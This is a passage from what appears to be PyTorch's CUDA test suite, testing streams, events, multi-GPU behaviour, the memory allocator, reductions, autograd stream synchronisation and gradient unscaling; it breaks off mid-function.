p2c, c2p)) t.daemon = True t.start() c2p.get() with torch.cuda.device('cuda:0'): e_tik.record() p2c.put(0) parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES) child_time = c2p.get() e_tok.record() e_tok.synchronize() total_time = e_tik.elapsed_time(e_tok) # Without GIL, synchronizations in parent and child threads can # overlap. The total execution time should be a little bit longer # than spinning fifty million cycles and much shorter than twice of # that. However, testing absolute execution time is not reliable as # it may vary on different hardware in different environments. # Therefore, this test uses relative comparisons, checking if the # sum of parent and child threads execution time is greater than the # real execution time by least 40%. self.assertGreater(parent_time + child_time, total_time * 1.4) # This test is flaky for ROCm, see issue #62602 @skipIfRocm @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_events_wait(self): d0 = torch.device('cuda:0') d1 = torch.device('cuda:1') torch.cuda.synchronize(d0) torch.cuda.synchronize(d1) with torch.cuda.device(d0): s0 = torch.cuda.current_stream() torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES) e0 = torch.cuda.Event() s0.record_event(e0) with torch.cuda.device(d1): s1 = torch.cuda.current_stream() self.assertFalse(s0.query()) self.assertTrue(s1.query()) s1.wait_event(e0) s1.synchronize() self.assertTrue(e0.query()) self.assertTrue(s0.query()) self.assertTrue(s1.query()) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_events_multi_gpu_query(self): d0 = torch.device('cuda:0') d1 = torch.device('cuda:1') with torch.cuda.device(d0): s0 = torch.cuda.current_stream() e0 = s0.record_event() s0.synchronize() with torch.cuda.device(d1): s1 = torch.cuda.current_stream() torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES) e1 = s1.record_event() self.assertTrue(e0.query()) self.assertFalse(e1.query()) with torch.cuda.device(d0): self.assertTrue(e0.query()) self.assertFalse(e1.query()) with torch.cuda.device(d1): self.assertTrue(e0.query()) self.assertFalse(e1.query()) # deliberately using a different device with torch.cuda.device(d0): e1.synchronize() self.assertTrue(e0.query()) self.assertTrue(e1.query()) with torch.cuda.device(d0): self.assertTrue(e0.query()) self.assertTrue(e1.query()) with torch.cuda.device(d1): self.assertTrue(e0.query()) self.assertTrue(e1.query()) @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") @skipIfRocm def test_events_multi_gpu_elapsed_time(self): d0 = torch.device('cuda:0') d1 = torch.device('cuda:1') with torch.cuda.device(d0): s0 = torch.cuda.current_stream() e0 = torch.cuda.Event(enable_timing=True) torch.cuda._sleep(10) s0.record_event(e0) with torch.cuda.device(d1): s1 = torch.cuda.current_stream() e1 = torch.cuda.Event(enable_timing=True) torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES) s1.record_event(e1) e0.synchronize() e1.synchronize() with torch.cuda.device(d0): with self.assertRaises(RuntimeError): self.assertGreater(e0.elapsed_time(e1), 0) with torch.cuda.device(d1): with self.assertRaises(RuntimeError): self.assertGreater(e0.elapsed_time(e1), 0) with torch.cuda.device(d0): s0 = torch.cuda.current_stream() e2 = torch.cuda.Event(enable_timing=True) torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES) s0.record_event(e2) s0.synchronize() self.assertGreater(e0.elapsed_time(e2), 0) # deliberately calling from a different device with torch.cuda.device(d1): self.assertGreater(e0.elapsed_time(e2), 0) def test_record_stream(self): cycles_per_ms = get_cycles_per_ms() t = torch.FloatTensor([1, 2, 3, 4]).pin_memory() result = torch.cuda.FloatTensor(t.size()) stream = torch.cuda.Stream() ptr = [None] # Performs the CPU->GPU copy in a background stream def perform_copy(): with torch.cuda.stream(stream): tmp = t.cuda(non_blocking=True) ptr[0] = tmp.data_ptr() torch.cuda.current_stream().wait_stream(stream) tmp.record_stream(torch.cuda.current_stream()) torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy result.copy_(tmp) perform_copy() with torch.cuda.stream(stream): tmp2 = torch.cuda.FloatTensor(t.size()) tmp2.zero_() self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used to soon') self.assertEqual(result.tolist(), [1, 2, 3, 4]) # Check that the block will be re-used after the main stream finishes torch.cuda.current_stream().synchronize() with torch.cuda.stream(stream): tmp3 = torch.cuda.FloatTensor(t.size()) self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used') def test_record_stream_on_shifted_view(self): # See issue #27366 # This test detects unexpected block reallocation. For reliable test, # the stream to allocate tensors is isolated. The allocator will not # reuse free blocks which were allocated from another stream. stream_alloc = torch.cuda.Stream() with torch.cuda.stream(stream_alloc): base = torch.cuda.FloatTensor([10, 10]) # Record another stream on a shifted view tensor. view = base[5:] assert view.storage_offset() > 0 stream_record = torch.cuda.Stream() with torch.cuda.stream(stream_record): torch.cuda._sleep(int(50 * get_cycles_per_ms())) view.record_stream(stream_record) # Delete those tensors to make the block free soon. data_ptr = base.data_ptr() del base, view # A new tensor should not be allocated to the block above. stream_alloc.synchronize() with torch.cuda.stream(stream_alloc): try_realloc = torch.cuda.FloatTensor([10, 10]) self.assertNotEqual(try_realloc.data_ptr(), data_ptr) @contextlib.contextmanager def _get_external_stream(self, device): cudart = torch.cuda.cudart() stream = ctypes.c_ulonglong(0) stream_p = ctypes.POINTER(ctypes.c_void_p)(stream) stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value with device: try: out = cudart.cudaStreamCreate(stream_p_int) self.assertEqual(out, 0) self.assertNotEqual(stream.value, 0) yield stream.value finally: out = cudart.cudaStreamDestroy(stream.value) self.assertEqual(out, 0) @skipIfRocm def test_external_streams(self): device = torch.cuda.device(0) with self._get_external_stream(device) as stream_v: ext_stream = torch.cuda.ExternalStream(stream_v) self.assertEqual(stream_v, ext_stream.cuda_stream) self.assertEqual(ext_stream.device.index, device.idx) @skipIfRocm @unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU") def test_external_streams_multi_device(self): device = torch.cuda.device(1) with self._get_external_stream(device) as stream_v: ext_stream = torch.cuda.ExternalStream( stream_v, device=device) self.assertEqual(stream_v, ext_stream.cuda_stream) self.assertEqual(ext_stream.device.index, device.idx) def test_noncontiguous_pinned_memory(self): # See issue #3266 x = torch.arange(0, 10).view((2, 5)) self.assertEqual(x.t(), x.t().pin_memory()) def test_caching_pinned_memory(self): cycles_per_ms = get_cycles_per_ms() # check that allocations are re-used after deletion t = torch.FloatTensor([1]).pin_memory() ptr = t.data_ptr() del t t = torch.FloatTensor([1]).pin_memory() self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused') # check that the allocation is not re-used if it's in-use by a copy gpu_tensor = torch.cuda.FloatTensor([0]) torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy gpu_tensor.copy_(t, non_blocking=True) del t t = torch.FloatTensor([1]).pin_memory() self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon') self.assertEqual(list(gpu_tensor), [1]) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_caching_pinned_memory_multi_gpu(self): # checks that the events preventing pinned memory from being re-used # too early are recorded on the correct GPU cycles_per_ms = get_cycles_per_ms() t = torch.FloatTensor([1]).pin_memory() ptr = t.data_ptr() gpu_tensor0 = torch.cuda.FloatTensor([0], device=0) gpu_tensor1 = torch.cuda.FloatTensor([0], device=1) with torch.cuda.device(1): torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy gpu_tensor1.copy_(t, non_blocking=True) del t t = torch.FloatTensor([2]).pin_memory() self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon') with torch.cuda.device(0): gpu_tensor0.copy_(t, non_blocking=True) self.assertEqual(gpu_tensor1[0], 1) self.assertEqual(gpu_tensor0[0], 2) def test_caching_allocator_record_stream_oom(self): """allocations delayed by a record_stream call should still be freed on an out-of-memory in cuda_malloc_retry. see issue #19219""" stream = torch.cuda.Stream() with torch.cuda.stream(stream): y = torch.zeros(40 * 1024 * 1024, device='cuda') for _ in range(100): x = torch.empty(40 * 1024 * 1024, device='cuda') with torch.cuda.stream(stream): y += x # delays re-use of `x` until after all operations in `stream` x.record_stream(stream) del x # we've made a mess by allocating up to the device capacity. free any # cached blocks in case it affects future tests. torch.cuda.empty_cache() # Tests for historic illegal memory access, see #17040. def test_reduction_gpu_memory_accessing(self): x = torch.ones(512, 8, dtype=torch.float32, device='cuda') torch.sum(x, 0) def test_sum_fp16(self): x = torch.zeros(10, device='cuda', dtype=torch.float16) self.assertEqual(x.sum(), 0) x = torch.ones(65504, device='cuda', dtype=torch.float16) self.assertEqual(x.sum(), 65504) self.assertEqual(x.sum(dtype=torch.float32), 65504) x = torch.ones(65536, device='cuda', dtype=torch.float16) self.assertEqual(x.sum(dtype=torch.float32), 65536) a = torch.zeros(1203611).bernoulli_(0.0005) x = a.to(device='cuda', dtype=torch.float16) self.assertEqual(x.sum().item(), a.sum().item()) a = torch.zeros(100, 121, 80).bernoulli_(0.0005) x = a.to(device='cuda', dtype=torch.float16) self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2))) def test_mean_fp16(self): x = torch.ones(65536, device='cuda', dtype=torch.float16) self.assertEqual(x.mean(), 1) x = torch.ones(65536, device='cuda', dtype=torch.float16) self.assertEqual(x.mean(dtype=torch.float32), 1) def test_prod_large(self): # tests global reduction (should_global_reduce = true) in case of non-zero identity element x = torch.ones(240000, device='cuda', dtype=torch.float32) self.assertEqual(x.prod(), 1) # test for complex types. Note 240k is divisible by 4 for dtype in [torch.cfloat, torch.cdouble]: x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j) self.assertEqual(x.prod(), 1) def test_multinomial_ext(self): # Test two corner cases from older PyTorch (Issue #4858) freqs = torch.cuda.FloatTensor([ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03178183361887932, 0.027680952101945877, 0.033176131546497345, 0.046052902936935425, 0.07742464542388916, 0.11543981730937958, 0.14148041605949402, 0.15784293413162231, 0.13180233538150787, 0.08271478116512299, 0.049702685326337814, 0.027557924389839172, 0.018125897273421288, 0.011851548217236996, 0.010252203792333603, 0.007422595750540495, 0.005372154992073774, 0.0045109698548913, 0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563, 0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129, 0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784, 0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815, 0.00020504408166743815, 0.00012302644609007984, 0.0, 0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]) torch.cuda.manual_seed(11042) sample = torch.multinomial(freqs, 1000, True) self.assertNotEqual(freqs[sample].min(), 0) p = torch.zeros(3421, 2, device="cuda", dtype=torch.float) p[:, 1] = 1 torch.cuda.manual_seed(5214) r = torch.multinomial(p, 1) self.assertNotEqual(r.min().item(), 0) # test corner case from Issue #13867 torch.cuda.manual_seed(33) probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5 samples = probs.multinomial(1000000, replacement=True) self.assertGreater(probs[samples].min().item(), 0) def _spawn_test_multinomial_invalid_probs_cuda(self, probs): import subprocess try: p = subprocess.Popen([sys.executable, '-c', f"""\ import sys import torch from torch._six import inf, nan try: with torch.random.fork_rng(devices=[0]): torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True) torch.cuda.synchronize() sys.exit(-1) # Should not be reached except RuntimeError as e: sys.exit(-2) """], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True) out, err = p.communicate(timeout=10) p.wait(timeout=10) except subprocess.TimeoutExpired as e: p.kill() out, err = p.communicate() expected_messages = [ 'device-side assert triggered', # CUDA 'Assertion', # CUDA 'HSA_STATUS_ERROR_EXCEPTION', # ROCm 'Device-side assertion' # ROCm ] self.assertTrue(any([msg in out or msg in err for msg in expected_messages])) @slowTest @unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \ don't support multiprocessing with spawn start method") def test_multinomial_invalid_probs_cuda(self): self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.]) self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.]) self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.]) self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan]) @slowTest @unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory") def test_huge_index(self): src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22) idx = torch.randperm(src.shape[0], device='cuda') res = src[idx] res_cpu = src.cpu()[idx.cpu()] self.assertEqual(res.cpu(), res_cpu) def test_min_max_inits(self): # Testing if THC_reduceAll received the correct index initialization. # This affects the result of THC_reduceAll operations at extreme values x = torch.cuda.ByteTensor([0]) y = torch.cuda.ByteTensor([255]) expected = torch.cuda.LongTensor([0])[0] _, v = x.max(dim=0) self.assertEqual(v, expected) _, v = y.min(dim=0) self.assertEqual(v, expected) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_get_set_rng_state_all(self): states = torch.cuda.get_rng_state_all() before0 = torch.cuda.FloatTensor(100, device=0).normal_() before1 = torch.cuda.FloatTensor(100, device=1).normal_() torch.cuda.set_rng_state_all(states) after0 = torch.cuda.FloatTensor(100, device=0).normal_() after1 = torch.cuda.FloatTensor(100, device=1).normal_() self.assertEqual(before0, after0, atol=0, rtol=0) self.assertEqual(before1, after1, atol=0, rtol=0) def test_nvtx(self): # Just making sure we can see the symbols torch.cuda.nvtx.range_push("foo") torch.cuda.nvtx.mark("bar") torch.cuda.nvtx.range_pop() range_handle = torch.cuda.nvtx.range_start("range_start") torch.cuda.nvtx.range_end(range_handle) def test_bincount_ext(self): # ensure CUDA code coverage input_size = (5000,) w = torch.randn(input_size, dtype=torch.double, device='cuda') w_cpu = w.cpu() # test shared memory impl t = torch.randint(50, input_size, dtype=torch.int8, device='cuda') self.assertEqual(t.cpu().bincount(), t.bincount()) self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w)) # test multi block memory impl # see `THRESH_NUMBER_BINS_FOR_MULTI_BLOCK_MEM` in SummaryOps.cu t = torch.randint(500, input_size, dtype=torch.int64, device='cuda') self.assertEqual(t.cpu().bincount(), t.bincount()) self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w)) # test global memory impl # see `THRESH_NUMBER_BINS_FOR_GLOBAL_MEM` in SummaryOps.cu t = torch.randint(2000, input_size, dtype=torch.int64, device='cuda') self.assertEqual(t.cpu().bincount(), t.bincount()) self.assertEqual(t.cpu().bincount(w_cpu), t.bincount(w)) t = torch.zeros([10], dtype=torch.int32, device='cuda') # 35488 * 65536 as int32 would cause overflow to negative value # giving negative bin offset t[0] = 35488 counted = t.bincount(minlength=65536) self.assertEqual(torch.sum(counted), 10) def test_tiny_half_norm_(self): a = torch.arange(25).cuda().float() a /= 100000000 b = a.half() self.assertGreater(b.norm().item(), 0) def test_norm_type_conversion(self): a = torch.ones(65536).cuda().half() self.assertEqual(a.norm(p=0, dtype=torch.float32), 65536) # Verifies that mem_get_info works, including when called for a different device def test_mem_get_info(self): def _test(idx): before_free_bytes, before_available_bytes = torch.cuda.mem_get_info(idx) # increasing to 8MB to force acquiring a new block and overcome blocksize differences across platforms t = torch.randn(1024 * 1024 * 8, device='cuda:' + str(idx)) after_free_bytes, after_available_bytes = torch.cuda.mem_get_info(idx) self.assertTrue(after_free_bytes < before_free_bytes) self.assertEqual(before_available_bytes, after_available_bytes) _test(0) if TEST_MULTIGPU: _test(1) # Test that wrap_with_cuda_memory_check successfully detects leak # skip for ROCM. Look into #62533. @skipIfRocm def test_cuda_memory_leak_detection(self): l = [] @self.wrap_with_cuda_memory_check def no_leak(): pass @self.wrap_with_cuda_memory_check def leak_gpu0(): # increasing to 8MB to force acquiring a new block and overcome blocksize differences across platforms l.append(torch.randn(1024 * 1024 * 8, device=torch.device("cuda:0"))) no_leak() with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 0.+"): leak_gpu0() if TEST_MULTIGPU: @self.wrap_with_cuda_memory_check def leak_gpu1(): # increasing to 8MB to force acquiring a new block and overcome blocksize differences across platforms l.append(torch.randn(1024 * 1024 * 8, device=torch.device("cuda:1"))) with self.assertRaisesRegex(RuntimeError, r"CUDA driver API confirmed .+ on device 1.+"): leak_gpu1() def test_cuda_memory_leak_detection_propagates_errors(self): with self.assertRaisesRegex(RuntimeError, r"The size of tensor a \(3\) must match"): with self.assertLeaksNoCudaTensors(): x = torch.randn(3, 1, device='cuda') y = torch.randn(2, 1, device='cuda') z = x + y def test_trilu_indices(self): for test_args in tri_tests_args: _compare_trilu_indices(self, *test_args, device='cuda') # test default options x = torch.ones( 3, 3, dtype=torch.long, device='cuda', layout=torch.strided) self.assertEqual( x.tril(0).nonzero().transpose(0, 1), torch.tril_indices(3, 3, device='cuda')) self.assertEqual( x.triu(0).nonzero().transpose(0, 1), torch.triu_indices(3, 3, device='cuda')) def test_large_trilu_indices(self): for test_args in tri_large_tests_args: _compare_large_trilu_indices(self, *test_args, device='cuda') @unittest.skipIf(not TEST_MEDIUM_TENSOR, "not enough memory") def test_cuda_kernel_loop_overflow(self): # Issue #24309: In extreme cases, the loop variable could overflow and continue # the kernel loop with a negative index, causing a RuntimeError (invalid write): x = torch.randn(1, 1, 1, 2**30 + 1, dtype=torch.float16, device="cuda") expected = x[0, 0, 0, 2**30] y = torch.nn.functional.avg_pool2d(x, kernel_size=1) torch.cuda.synchronize() self.assertEqual(y[0, 0, 0, 2**30], expected) @unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory") def test_cuda_kernel_loop_overflow_large(self): # Make sure input.numel() > INT_MAX is handled: x = torch.randn(1, 1, 1, 2**31, dtype=torch.float16, device="cuda") with self.assertRaisesRegex(RuntimeError, "integer out of range"): y = torch.nn.functional.avg_pool2d(x, kernel_size=1) # Issue #24309: In extreme cases, the loop variable could overflow and continue # the kernel loop with a negative index, causing a RuntimeError (invalid write): x = torch.randn(1, 1, 1, 2**31 - 1, dtype=torch.float16, device="cuda") expected = x[0, 0, 0, 2**31 - 2] y = torch.nn.functional.avg_pool2d(x, kernel_size=1) torch.cuda.synchronize() self.assertEqual(y[0, 0, 0, 2**31 - 2], expected) # this might create a reference cycle on self... def _make_multiply_in_stream(self): class MultiplyInStream(torch.autograd.Function): @staticmethod def forward(ctx, x, val): ctx.val = val ctx.stream = torch.cuda.current_stream() return x * val @staticmethod def backward(ctx, grad): self.assertEqual(torch.cuda.current_stream(), ctx.stream) # delays the operation in the the background stream torch.cuda._sleep(1000 * 5000) return grad * ctx.val, None return MultiplyInStream @skipCUDANonDefaultStreamIf(True) def test_streaming_backwards_sync(self): default_stream = torch.cuda.current_stream() stream = torch.cuda.Stream() MultiplyInStream = self._make_multiply_in_stream() # Tests using grads outside the backward() stream context # See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html x = torch.randn(5, 5, device='cuda', requires_grad=True) with torch.cuda.stream(stream): stream.wait_stream(default_stream) output = MultiplyInStream.apply(x, 2) output.sum().backward() # sync needed default_stream.wait_stream(stream) self.assertEqual(x.grad, torch.ones_like(x) * 2) self.assertEqual(torch.cuda.current_stream(), default_stream) # Tests that using grads in the same stream context as backward() # is safe regardless what streams bwd ops ran on bwd_ambient_stream = torch.cuda.Stream() x = torch.randn(5, 5, device='cuda', requires_grad=True) with torch.cuda.stream(stream): stream.wait_stream(default_stream) output = MultiplyInStream.apply(x, 3) with torch.cuda.stream(bwd_ambient_stream): bwd_ambient_stream.wait_stream(stream) output.sum().backward() # x was first used on "stream" so its AccumulateGrad leaf should run on "stream". # The end of backward() should have synced "bwd_ambient_stream" with "stream" # so it should be safe to use x.grad here without any syncs. self.assertEqual(x.grad, torch.ones_like(x) * 3) self.assertEqual(torch.cuda.current_stream(), bwd_ambient_stream) # Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190 @skipIfRocm def test_streaming_backwards_multiple_streams(self): MultiplyInStream = self._make_multiply_in_stream() class StreamModel(torch.nn.Module): def __init__(self): super(StreamModel, self).__init__() self.event = torch.cuda.Event() self.stream0 = torch.cuda.Stream() self.stream1 = torch.cuda.Stream() def forward(self, x, x_first_use_on_ambient): if x_first_use_on_ambient: x0 = x.clone() self.stream0.wait_stream(torch.cuda.current_stream()) self.stream1.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(self.stream0): if not x_first_use_on_ambient: x0 = x.clone() y0 = MultiplyInStream.apply(x0, 2) self.event.record(stream=torch.cuda.current_stream()) with torch.cuda.stream(self.stream1): y1 = MultiplyInStream.apply(x, 3) self.stream1.wait_event(self.event) return y0 + y1 stream = torch.cuda.Stream() for x_first_use_on_ambient in (True, False): # the out_of_place=False, iters=1 case stresses if proper syncs are inserted # when grads are initially None and stolen by backward ops. for out_of_place, iters in ((True, 1), (False, 1), (False, 5)): with torch.cuda.stream(stream): x = torch.randn(5, 5, device='cuda', requires_grad=True) model = StreamModel().cuda() x.register_hook(lambda grad: self.assertEqual(torch.cuda.current_stream(), stream if x_first_use_on_ambient else model.stream0)) for p in model.parameters(): self.assertTrue(p.grad is None) for i in range(iters): loss = model(x, x_first_use_on_ambient).sum() if out_of_place: x_grad = torch.autograd.grad((loss,), (x,))[0] else: loss.backward() # See "Stream semantics of backward passes" on https://pytorch.org/docs/stable/notes/cuda.html torch.cuda.current_stream().wait_stream(stream) if out_of_place: self.assertEqual(x_grad, torch.ones_like(x) * 5 * iters) else: self.assertEqual(x.grad, torch.ones_like(x) * 5 * iters) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") def test_streaming_backwards_device_transfer(self): # This function must run with non-default current streams on all devices, otherwise it's meaningless. # The intention is to test that to()'s backward (CopyBackward) interacts properly with the # synchronization logic in torch/csrc/autograd/input_buffer.cpp. dev0 = torch.device("cuda:0") dev1 = torch.device("cuda:1") # Unfortunately I need to make the tensors largeish. # Bigger tensors = longer D2D transfers = more likely to expose races. size = 2**26 a = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True) b = torch.full((size,), 1, device=dev1, dtype=torch.float64, requires_grad=True) # Here to_backward_recipient = a*b is used only once, so MulBackward's InputBuffer slot only expects 1 input. # This tests the situation where we don't call InputBuffer::accumulate for MulBackward's InputBuffer. to_backward_recipient = a * b s = to_backward_recipient.to(device="cuda:0").sum() torch.cuda.synchronize(device=dev0) torch.cuda.synchronize(device=dev1) s.backward() self.assertTrue(a.grad.sum().item() == size) self.assertTrue(b.grad.sum().item() == size) # Here to_backward_recipient = a*b is used twice, so MulBackward's InputBuffer slot expects 2 inputs. # This tests the situation where we do call InputBuffer::accumulate for MulBackward's InputBuffer. a.grad = None b.grad = None to_backward_recipient = a * b # Multiply by 2 here so to's backward creates gradient values that are different from the case above, # to mitigate weirdness if the caching allocator happens to reuse memory regions that were populated # with 1s by the case above s0 = to_backward_recipient.to(device="cuda:0").sum() * 2. s1 = to_backward_recipient.to(device="cuda:0").sum() * 2. torch.cuda.synchronize(device=dev0) torch.cuda.synchronize(device=dev1) s0.backward(retain_graph=True) s1.backward() self.assertTrue(a.grad.sum().item() == 4 * size) self.assertTrue(b.grad.sum().item() == 4 * size) def test_streaming_backwards_sync_graph_root(self): # This function tests if bwd ops running on a side stream properly sync with the GraphRoot. # The potential bug it targets is a race condition. The test uses multiple trials and # torch.cuda._sleep such that if the race condition exists, the test will almost certainly fail, # but there's a chance it may spuriously pass. Passing does not guarantee the backend is bug-free, # but failure does guarantee there is a bug. fwd_bwd_op_stream = torch.cuda.Stream() bwd_ambient_stream = torch.cuda.Stream() # We need these streams to be different otherwise the test is meaningless. self.assertTrue(fwd_bwd_op_stream != bwd_ambient_stream) size = int(1e3) a = torch.full((size,), 2.0, device="cuda", requires_grad=True) b = torch.full((size,), 3.0, device="cuda", requires_grad=True) # I don't think we need any manual record_streams below. # a and b remain in scope for the entire test. # c and grad remain in scope for each iteration, and there's a full sync between iterations. for trial in range(5): torch.cuda.synchronize() a.grad = b.grad = None with torch.cuda.stream(fwd_bwd_op_stream): c = a * b with torch.cuda.stream(bwd_ambient_stream): torch.cuda.synchronize() # Long-running dummy kernel on bwd_ambient_stream delays filling of grad torch.cuda._sleep(int(50 * get_cycles_per_ms())) # Fills grad on bwd_ambient_stream grad = torch.full((size,), float(trial + 1), device="cuda") # Bwd ops still run on fwd_bwd_ops_stream, so the following will likely fail if # bwd ops don't sync with bwd_ambient_stream before consuming grad. torch.autograd.backward(tensors=c, grad_tensors=grad) # See https://github.com/pytorch/pytorch/issues/47028 # assertEquals below run on bwd_ambient_stream, so this test may also fail # if backward() fails to sync with bwd_ambient_stream at the end. # Synchronizing here works around the issue until a proper fix can be made. torch.cuda.synchronize() with torch.no_grad(): self.assertEqual(a.grad, grad * b) self.assertEqual(b.grad, grad * a) def test_streaming_backwards_callback(self): # Tests if autograd callbacks sync properly with respect to leaf streams and # the user-facing stream surrounding backward(). If it fails, first suspect is # sync logic where "final_callbacks_" are called in torch/csrc/autograd/engine.cpp MultiplyInStream = self._make_multiply_in_stream() size = int(1e3) a = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True) b = torch.full((size,), 1, device="cuda", dtype=torch.float, requires_grad=True) s0 = torch.cuda.Stream() s1 = torch.cuda.Stream() s2 = torch.cuda.Stream() stash = [] # sets up a nontrivial structure of leaf streams s0.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(s0): c = MultiplyInStream.apply(a, 2) s1.wait_stream(torch.cuda.current_stream()) with torch.cuda.stream(s1): d = MultiplyInStream.apply(b, 3) s1.wait_stream(s0) e = c * d def clone_leaf_grads(): stash.append(a.grad.clone()) stash.append(b.grad.clone()) # Use a hook on e to install the callback e.register_hook(lambda grad: torch.autograd.Variable._execution_engine.queue_callback(clone_leaf_grads)) s2.wait_stream(s1) with torch.cuda.stream(s2): e.sum().backward() # The autograd engine should sync s2 with all leaf streams then run the callback clone_leaf_grads on s2. # If those things happened properly, checking the values of the cloned grads on s2 should be safe: self.assertEqual(stash[0], torch.full_like(a, 6)) self.assertEqual(stash[1], torch.full_like(a, 6)) @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected") @unittest.skipIf(IS_SANDCASTLE or IS_REMOTE_GPU, "Does not work on Sandcastle") def test_cuda_init_race(self): # See https://github.com/pytorch/pytorch/issues/16559 import subprocess subprocess.check_call([sys.executable, '-c', """\ import torch import threading def worker(rank): torch.tensor([1.]).cuda(rank) t1 = threading.Thread(target=worker, args=(0,)) t2 = threading.Thread(target=worker, args=(1,)) t1.start() t2.start() """]) def test_fixed_cuda_assert_async(self): with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with no values is ambiguous"): torch._assert_async(torch.tensor([], device="cuda")) with self.assertRaisesRegex(RuntimeError, "Boolean value of Tensor with more than one value is ambiguous"): torch._assert_async(torch.tensor([0, 0], device="cuda")) torch._assert_async(torch.tensor(1, device="cuda")) torch._assert_async(torch.tensor(0.1, device="cuda")) torch._assert_async(torch.tensor(-0.1, device="cuda")) torch._assert_async(torch.tensor(True, device="cuda")) torch._assert_async(torch.tensor(0 + 0.1j, device="cuda")) fail_stmts = [ "torch._assert_async(torch.tensor(0, device='cuda'))", "torch._assert_async(torch.tensor(0.0, device='cuda'))", "torch._assert_async(torch.tensor(False, device='cuda'))", "torch._assert_async(torch.tensor(0 + 0j, device='cuda'))", ] import subprocess for stmt in fail_stmts: with self.subTest(stmt=stmt): r = subprocess.call([sys.executable, '-c', f"""\ import torch {stmt} torch.cuda.synchronize() """]) self.assertTrue(r != 0) def test_grad_scaling_unscale(self, dtype=torch.float): inv_scale = torch.full((1,), 0.25, dtype=torch.float, device="cuda:0") found_inf = torch.full((1,), 0.0, dtype=torch.float, device="cuda:0") size = 10 g = torch.full((size, size), 4.0, dtype=dtype, device="cuda:0") ginf = g.clone() ginf[2, 2] = float('inf') gnan = g.clone() gnan[2, 2] = float('nan') # Tries selected combinations of # - contiguous grads # - g.clone().t() which is not contiguous but still non overlapping and dense # - variants of g.clone()[:, :5] which are not non overlapping and dense # Non overlapping and dense grads route into a multi tensor apply kernel, # others use a fallback per-tensor kernel, so we should try both. cases = ( ([g.clone(), g.clone()], False), ([g.clone(), g.clone().t()], False), ([g.clone(), g.clone()[:, :5]], False), ([g.clone()[:, :5], g.clone()[:, :5]], False), ([g.clone(), ginf.clone()], True), ([g.clone(), gnan.clone()], True), ([g.clone(), ginf.clone()[:, :5]], True), ([g.clone(), gnan.clone()[:, :5]], True), ([ginf.clone(), g.clone()[:, :5]], True), ([ginf.clone()[:, :5], g.clone()[:, :5]], True), ) for grads, has_inf in cases: found_inf.zero_() torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale) if has_inf: self.assertEqual(found_inf, 1.0) else: self.assertEqual(found_inf, 0.0) for grad in grads: self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7) # When passing lists with mismatched dtypes to a raw # _amp_foreach_non_finite_check_and_unscale_ call, # it's expected to fall back to single-tensor TensorIterator kernel. grads = [g.clone(), g.to(dtype=torch.float16)] torch._amp_foreach_non_finite_check_and_unscale_(grads, found_inf, inv_scale) for grad in grads: self.assertEqual(grad, torch.ones_like(grad), rtol=1e-5, atol=1e-7) # Passing lists with mismatched devices to a raw # _amp_foreach_non_finite_check_and_unscale_ call should raise errors. if TEST_MULTIGPU: with self.assertRaisesRegex(RuntimeError, r"Expected all tensors to be on the same device"): torch._amp_foreach_non_finite_check_and_unscale_([g.clone(), g.to(device="cuda:1")], found_inf, inv_scale) # Creates a list of grads with mismatched dtypes and devices, to ensure # scaler._unscale_grads_ organizes grads by dtype and device before calling # _amp_foreach_non_finite_check_and_unscale_ on each set. # If inject_inf >= 0, writes an inf into one grad for _unscale_grads_ to find. def perfect_storm_grads(inject_inf): grads 